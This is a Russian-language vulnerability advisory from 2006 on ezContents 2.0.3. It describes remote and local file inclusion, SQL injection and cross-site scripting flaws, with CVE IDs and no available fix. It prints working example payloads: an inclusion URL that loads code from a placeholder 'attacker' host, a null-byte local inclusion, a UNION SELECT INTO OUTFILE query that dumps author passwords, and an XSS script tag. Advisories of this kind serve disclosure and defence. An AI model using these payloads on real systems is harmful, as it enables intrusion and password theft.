Security Lab

Множественные уязвимости в ezContents

Дата публикации:04.09.2006
Дата изменения:17.10.2006
Всего просмотров:3004
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2006-4477
CVE-2006-4478
CVE-2006-4479
CVE-2008-2135
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ezContents 2.x
Уязвимые версии: ezContents 2.0.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения и выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в функции "moduleExternalLink()" в сценарии modules/moduleSec.php. Удаленный пользователь может просмотреть произвольные файлы или выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://attacker/file.php
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=/tmp/file.php%00

Уязвимость существует также в функции "isExternalLink()" в сценарии include/functions.php и в функции "adminExternalLink()" в сценарии admin/adminbutton.php.

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "groupname" сценария headeruserdata.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #

3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "subgroupname" сценария loginreg2.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/loginreq2.php?subgroupname="><script>alert(666)</script>

URL производителя: www.ezcontents.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS